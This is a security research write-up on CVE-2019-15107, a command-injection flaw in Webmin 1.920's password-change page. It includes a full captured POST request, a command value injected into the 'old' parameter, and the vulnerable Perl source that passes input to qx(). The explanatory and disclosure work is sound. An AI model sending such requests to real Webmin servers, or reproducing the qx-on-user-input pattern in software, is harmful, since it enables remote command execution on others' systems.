【CVE-2019-15107】:RCE in Webmin <= 1.920 via password-change

CVE-2019-15107:RCE in Webmin <= 1.920 via password-change

中文：https://xz.aliyun.com/t/6040

0x01 Reproduce

• webmin 1.920
• Ubuntu

To reproduce this vulnerability, you need enable the password-change feature.

https://ip:10000/webmin/edit_session.cgi?xnavigation=1 :

Then you can check the config and the passwd_mode value has been changed

# cat /etc/webmin/miniserv.conf
...
passwd_mode=2
...

You can capture post request like this:

POST /password_change.cgi HTTP/1.1
Host: yourip:10000
Connection: close
Content-Length: 63
Cache-Control: max-age=0
Origin: https://yourip:10000
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Referer: https://yourip:10000/session_login.cgi
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: redirect=1; testing=1; sessiontest=1; sid=x

user=root&pam=1&expired=2&old=buyaoxiedaopocli&new1=buyaoxiedaopocli&new2=buyaoxiedaopocli

Set the parameter old value as |ifconfig

0x02 Analysis

In password_change.cgi ：

# line 18 ~ line 31
# Is this a Webmin user?
if (&foreign_check("acl")) {
	&foreign_require("acl", "acl-lib.pl");
	($wuser) = grep { $_->{'name'} eq $in{'user'} } &acl::list_users();
	if ($wuser->{'pass'} eq 'x') {
		# A Webmin user, but using Unix authentication
		$wuser = undef;
		}
	elsif ($wuser->{'pass'} eq '*LK*' ||
	       $wuser->{'pass'} =~ /^\!/) {
		&pass_error("Webmin users with locked accounts cannot change ".
		       	    "their passwords!");
		}
}

The code will check whether the parameter user is a Webmin user. If there is a Webmin user named root and we set user=root,then the $wuser‘s value will be root.

If we set user=xxxx，then $wuser will still be undef after grep。

However the following is $wuser->{'pass'}，which will change $wuser value from undef to {}

So whatever user you have provided, you will be step in the code segment to update webmin user’s password.

• user=root

• user=noexists_user

Now let’s check the password_change.cgi line 37 ~ line 40：

if ($wuser) {
	# Update Webmin user's password
	$enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
	...
}

The implemention of function encrypt_password is of no importance . You should pay attention to how Webmin handles the error message.

&pass_error($text{'password_eold'},qx/$in{'old'}/);

Webmin just put our parameter old in qx/.../！

And after executing system commands, Webmin will print the result:

So in conclusion there is no need to add a vertical bar (|) , we just set our parameter old value as ifconfig

By the way , there is an interesting issue https://github.com/webmin/webmin/issues/947

0x03 Patch

webmin 1.930 fix this security vulnerability by removing the qx() backdoor：